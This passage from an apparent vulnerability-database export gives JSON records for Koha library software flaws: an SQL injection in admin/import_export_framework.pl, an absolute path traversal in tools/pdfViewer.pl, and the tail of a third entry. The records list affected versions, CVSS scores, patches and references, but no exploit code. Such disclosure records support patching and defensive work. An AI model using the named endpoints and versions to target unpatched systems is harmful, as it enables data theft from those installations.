"id": "CNVD-2015-05197"
},
{
"date": "2015-06-25T00:00:00",
"db": "BID",
"id": "75426"
},
{
"date": "2019-01-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-008221"
},
{
"date": "2015-06-26T23:02:22",
"db": "PACKETSTORM",
"id": "132458"
},
{
"date": "2015-06-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201512-698"
},
{
"date": "2018-10-18T21:29:01.800000",
"db": "NVD",
"id": "CVE-2015-4633"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-08-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-05198"
},
{
"date": "2015-08-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-05201"
},
{
"date": "2015-08-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-05199"
},
{
"date": "2015-08-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-05200"
},
{
"date": "2015-08-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-05197"
},
{
"date": "2015-06-25T00:00:00",
"db": "BID",
"id": "75426"
},
{
"date": "2019-01-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2015-008221"
},
{
"date": "2018-11-26T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201512-698"
},
{
"date": "2024-11-21T02:31:26.750000",
"db": "NVD",
"id": "CVE-2015-4633"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "PACKETSTORM",
"id": "132458"
},
{
"db": "CNNVD",
"id": "CNNVD-201512-698"
}
],
"trust": 0.7
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Koha SQL Injection Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-05197"
},
{
"db": "CNNVD",
"id": "CNNVD-201512-698"
}
],
"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SQL injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201512-698"
}
],
"trust": 0.6
}
}
var-202001-1231
Vulnerability from variot
SQL injection vulnerability in the MARC framework import/export function (admin/import_export_framework.pl) in Koha before 3.8.23, 3.10.x before 3.10.13, 3.12.x before 3.12.10, and 3.14.x before 3.14.3 allows remote authenticated users to execute arbitrary SQL commands via unspecified vectors. NOTE: this can be leveraged by remote attackers using CVE-2014-1924. Koha In SQL An injection vulnerability exists.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. Koha is prone to the following security vulnerabilities: 1. An arbitrary file-access vulnerability 2. A directory-traversal vulnerability 3. An arbitrary file-write vulnerability 4. An SQL-injection vulnerability An attacker may leverage these issues to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, read or write arbitrary files from the web server, and potentially obtain sensitive information on the affected application. This may aid in further attacks
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202001-1231",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "koha",
"scope": "lt",
"trust": 1.0,
"vendor": "koha",
"version": "3.08.23"
},
{
"model": "koha",
"scope": "lt",
"trust": 1.0,
"vendor": "koha",
"version": "3.12.10"
},
{
"model": "koha",
"scope": "gte",
"trust": 1.0,
"vendor": "koha",
"version": "3.10.00"
},
{
"model": "koha",
"scope": "gte",
"trust": 1.0,
"vendor": "koha",
"version": "3.14.00"
},
{
"model": "koha",
"scope": "gte",
"trust": 1.0,
"vendor": "koha",
"version": "3.12.00"
},
{
"model": "koha",
"scope": "lt",
"trust": 1.0,
"vendor": "koha",
"version": "3.14.03"
},
{
"model": "koha",
"scope": "lt",
"trust": 1.0,
"vendor": "koha",
"version": "3.10.13"
},
{
"model": "library software community koha",
"scope": "eq",
"trust": 0.3,
"vendor": "koha",
"version": "3.8.22"
},
{
"model": "library software community koha",
"scope": "eq",
"trust": 0.3,
"vendor": "koha",
"version": "3.14.2"
},
{
"model": "library software community koha",
"scope": "eq",
"trust": 0.3,
"vendor": "koha",
"version": "3.12.9"
},
{
"model": "library software community koha",
"scope": "eq",
"trust": 0.3,
"vendor": "koha",
"version": "3.10.12"
},
{
"model": "library software community koha",
"scope": "ne",
"trust": 0.3,
"vendor": "koha",
"version": "3.8.23"
},
{
"model": "library software community koha",
"scope": "ne",
"trust": 0.3,
"vendor": "koha",
"version": "3.14.3"
},
{
"model": "library software community koha",
"scope": "ne",
"trust": 0.3,
"vendor": "koha",
"version": "3.12.10"
},
{
"model": "library software community koha",
"scope": "ne",
"trust": 0.3,
"vendor": "koha",
"version": "3.10.13"
}
],
"sources": [
{
"db": "BID",
"id": "65448"
},
{
"db": "NVD",
"id": "CVE-2014-1925"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Chris Cormack, Galen Charlton, and John Lightsey",
"sources": [
{
"db": "BID",
"id": "65448"
}
],
"trust": 0.3
},
"cve": "CVE-2014-1925",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2014-1925",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2014-1925",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2014-1925",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2014-1925",
"trust": 1.0,
"value": "CRITICAL"
},
{
"author": "NVD",
"id": "CVE-2014-1925",
"trust": 0.8,
"value": "Critical"
},
{
"author": "CNNVD",
"id": "CNNVD-202001-1093",
"trust": 0.6,
"value": "CRITICAL"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-008838"
},
{
"db": "CNNVD",
"id": "CNNVD-202001-1093"
},
{
"db": "NVD",
"id": "CVE-2014-1925"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SQL injection vulnerability in the MARC framework import/export function (admin/import_export_framework.pl) in Koha before 3.8.23, 3.10.x before 3.10.13, 3.12.x before 3.12.10, and 3.14.x before 3.14.3 allows remote authenticated users to execute arbitrary SQL commands via unspecified vectors. NOTE: this can be leveraged by remote attackers using CVE-2014-1924. Koha In SQL An injection vulnerability exists.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. Koha is prone to the following security vulnerabilities:\n1. An arbitrary file-access vulnerability\n2. A directory-traversal vulnerability\n3. An arbitrary file-write vulnerability\n4. An SQL-injection vulnerability\nAn attacker may leverage these issues to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, read or write arbitrary files from the web server, and potentially obtain sensitive information on the affected application. This may aid in further attacks",
"sources": [
{
"db": "NVD",
"id": "CVE-2014-1925"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-008838"
},
{
"db": "BID",
"id": "65448"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2014-1925",
"trust": 2.7
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2014/02/07/10",
"trust": 1.6
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2014/02/10/3",
"trust": 1.6
},
{
"db": "JVNDB",
"id": "JVNDB-2014-008838",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202001-1093",
"trust": 0.6
},
{
"db": "BID",
"id": "65448",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "65448"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-008838"
},
{
"db": "CNNVD",
"id": "CNNVD-202001-1093"
},
{
"db": "NVD",
"id": "CVE-2014-1925"
}
]
},
"id": "VAR-202001-1231",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.5804196
},
"last_update_date": "2024-11-23T22:16:40.034000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Bug\u00a011666 Koha",
"trust": 0.8,
"url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11666"
},
{
"title": "Koha SQL Repair measures for injecting vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=112804"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-008838"
},
{
"db": "CNNVD",
"id": "CNNVD-202001-1093"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-89",
"trust": 1.0
},
{
"problemtype": "SQL injection (CWE-89) [NVD Evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-008838"
},
{
"db": "NVD",
"id": "CVE-2014-1925"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.9,
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11666"
},
{
"trust": 1.9,
"url": "http://koha-community.org/security-release-february-2014/"
},
{
"trust": 1.6,
"url": "http://www.openwall.com/lists/oss-security/2014/02/07/10"
},
{
"trust": 1.6,
"url": "http://www.openwall.com/lists/oss-security/2014/02/10/3"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-1925"
},
{
"trust": 0.3,
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11660"
},
{
"trust": 0.3,
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11661"
},
{
"trust": 0.3,
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11662"
},
{
"trust": 0.3,
"url": "http://koha-community.org/"
}
],
"sources": [
{
"db": "BID",
"id": "65448"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-008838"
},
{
"db": "CNNVD",
"id": "CNNVD-202001-1093"
},
{
"db": "NVD",
"id": "CVE-2014-1925"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "65448"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-008838"
},
{
"db": "CNNVD",
"id": "CNNVD-202001-1093"
},
{
"db": "NVD",
"id": "CVE-2014-1925"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-02-07T00:00:00",
"db": "BID",
"id": "65448"
},
{
"date": "2020-02-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-008838"
},
{
"date": "2020-01-24T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202001-1093"
},
{
"date": "2020-01-24T17:15:12.407000",
"db": "NVD",
"id": "CVE-2014-1925"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-02-07T00:00:00",
"db": "BID",
"id": "65448"
},
{
"date": "2020-02-13T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2014-008838"
},
{
"date": "2021-01-04T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202001-1093"
},
{
"date": "2024-11-21T02:05:17.213000",
"db": "NVD",
"id": "CVE-2014-1925"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "network",
"sources": [
{
"db": "BID",
"id": "65448"
}
],
"trust": 0.3
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Koha\u00a0 In \u00a0SQL\u00a0 Injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-008838"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SQL injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202001-1093"
}
],
"trust": 0.6
}
}
var-202001-1307
Vulnerability from variot
Absolute path traversal vulnerability in tools/pdfViewer.pl in Koha before 3.8.23, 3.10.x before 3.10.13, 3.12.x before 3.12.10, and 3.14.x before 3.14.3 allows remote attackers to read arbitrary files via unspecified vectors. Koha Contains a path traversal vulnerability.Information may be obtained. Koha is prone to the following security vulnerabilities: 1. An arbitrary file-access vulnerability 2. A directory-traversal vulnerability 3. An arbitrary file-write vulnerability 4. An SQL-injection vulnerability An attacker may leverage these issues to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, read or write arbitrary files from the web server, and potentially obtain sensitive information on the affected application. This may aid in further attacks
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202001-1307",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "koha",
"scope": "lt",
"trust": 1.0,
"vendor": "koha",
"version": "3.08.23"
},
{
"model": "koha",
"scope": "lt",
"trust": 1.0,
"vendor": "koha",
"version": "3.12.10"
},
{
"model": "koha",
"scope": "gte",
"trust": 1.0,
"vendor": "koha",
"version": "3.10.00"
},
{
"model": "koha",
"scope": "gte",
"trust": 1.0,
"vendor": "koha",
"version": "3.14.00"
},
{
"model": "koha",
"scope": "gte",
"trust": 1.0,
"vendor": "koha",
"version": "3.12.00"
},
{
"model": "koha",
"scope": "lt",
"trust": 1.0,
"vendor": "koha",
"version": "3.14.03"
},
{
"model": "koha",
"scope": "lt",
"trust": 1.0,
"vendor": "koha",
"version": "3.10.13"
},
{
"model": "library software community koha",
"scope": "eq",
"trust": 0.3,
"vendor": "koha",
"version": "3.8.22"
},
{
"model": "library software community koha",
"scope": "eq",
"trust": 0.3,
"vendor": "koha",
"version": "3.14.2"
},
{
"model": "library software community koha",
"scope": "eq",
"trust": 0.3,
"vendor": "koha",
"version": "3.12.9"
},
{
"model": "library software community koha",
"scope": "eq",
"trust": 0.3,
"vendor": "koha",
"version": "3.10.12"
},
{
"model": "library software community koha",
"scope": "ne",
"trust": 0.3,
"vendor": "koha",
"version": "3.8.23"
},
{
"model": "library software community koha",
"scope": "ne",
"trust": 0.3,
"vendor": "koha",
"version": "3.14.3"
},
{
"model": "library software community koha",
"scope": "ne",
"trust": 0.3,
"vendor": "koha",
"version": "3.12.10"
},
{
"model": "library software community koha",
"scope": "ne",
"trust": 0.3,
"vendor": "koha",
"version": "3.10.13"
}
],
"sources": [
{
"db": "BID",
"id": "65448"
},
{
"db": "NVD",
"id": "CVE-2014-1922"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Chris Cormack, Galen Charlton, and John Lightsey",
"sources": [
{
"db": "BID",
"id": "65448"
}
],
"trust": 0.3
},
"cve": "CVE-2014-1922",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 5.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CVE-2014-1922",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"id": "CVE-2014-1922",
"impactScore": 3.6,
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 7.5,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2014-1922",
"impactScore": null,
"integrityImpact": "None",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2014-1922",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2014-1922",
"trust": 0.8,
"value": "High"
},
{
"author": "CNNVD",
"id": "CNNVD-202001-1092",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-008841"
},
{
"db": "CNNVD",
"id": "CNNVD-202001-1092"
},
{
"db": "NVD",
"id": "CVE-2014-1922"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Absolute path traversal vulnerability in tools/pdfViewer.pl in Koha before 3.8.23, 3.10.x before 3.10.13, 3.12.x before 3.12.10, and 3.14.x before 3.14.3 allows remote attackers to read arbitrary files via unspecified vectors. Koha Contains a path traversal vulnerability.Information may be obtained. Koha is prone to the following security vulnerabilities:\n1. An arbitrary file-access vulnerability\n2. A directory-traversal vulnerability\n3. An arbitrary file-write vulnerability\n4. An SQL-injection vulnerability\nAn attacker may leverage these issues to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, read or write arbitrary files from the web server, and potentially obtain sensitive information on the affected application. This may aid in further attacks",
"sources": [
{
"db": "NVD",
"id": "CVE-2014-1922"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-008841"
},
{
"db": "BID",
"id": "65448"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2014-1922",
"trust": 2.7
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2014/02/07/10",
"trust": 1.6
},
{
"db": "OPENWALL",
"id": "OSS-SECURITY/2014/02/10/3",
"trust": 1.6
},
{
"db": "JVNDB",
"id": "JVNDB-2014-008841",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-202001-1092",
"trust": 0.6
},
{
"db": "BID",
"id": "65448",
"trust": 0.3
}
],
"sources": [
{
"db": "BID",
"id": "65448"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-008841"
},
{
"db": "CNNVD",
"id": "CNNVD-202001-1092"
},
{
"db": "NVD",
"id": "CVE-2014-1922"
}
]
},
"id": "VAR-202001-1307",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.5804196
},
"last_update_date": "2024-11-23T22:16:40.008000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Bug\u00a011660 Koha",
"trust": 0.8,
"url": "https://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11660"
},
{
"title": "Koha Repair measures for path traversal vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=112803"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-008841"
},
{
"db": "CNNVD",
"id": "CNNVD-202001-1092"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-22",
"trust": 1.0
},
{
"problemtype": "Path traversal (CWE-22) [NVD Evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2014-008841"
},
{
"db": "NVD",
"id": "CVE-2014-1922"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.9,
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11660"
},
{
"trust": 1.9,
"url": "http://koha-community.org/security-release-february-2014/"
},
{
"trust": 1.6,
"url": "http://www.openwall.com/lists/oss-security/2014/02/07/10"
},
{
"trust": 1.6,
"url": "http://www.openwall.com/lists/oss-security/2014/02/10/3"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2014-1922"
},
{
"trust": 0.3,
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11661"
},
{
"trust": 0.3,
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11662"
},
{
"trust": 0.3,
"url": "http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=11666"
},
{
"trust": 0.3,
"url": "http://koha-community.org/"
}
],
"sources": [
{
"db": "BID",
"id": "65448"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-008841"
},
{
"db": "CNNVD",
"id": "CNNVD-202001-1092"
},
{
"db": "NVD",
"id": "CVE-2014-1922"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "BID",
"id": "65448"
},
{
"db": "JVNDB",
"id": "JVNDB-2014-008841"
},
{
"db": "CNNVD",
"id": "CNNVD-202001-1092"
},
{
"db": "NVD",
"id": "CVE-2014-1922"
}
]
},
"sources_release_date": {
"@context": {
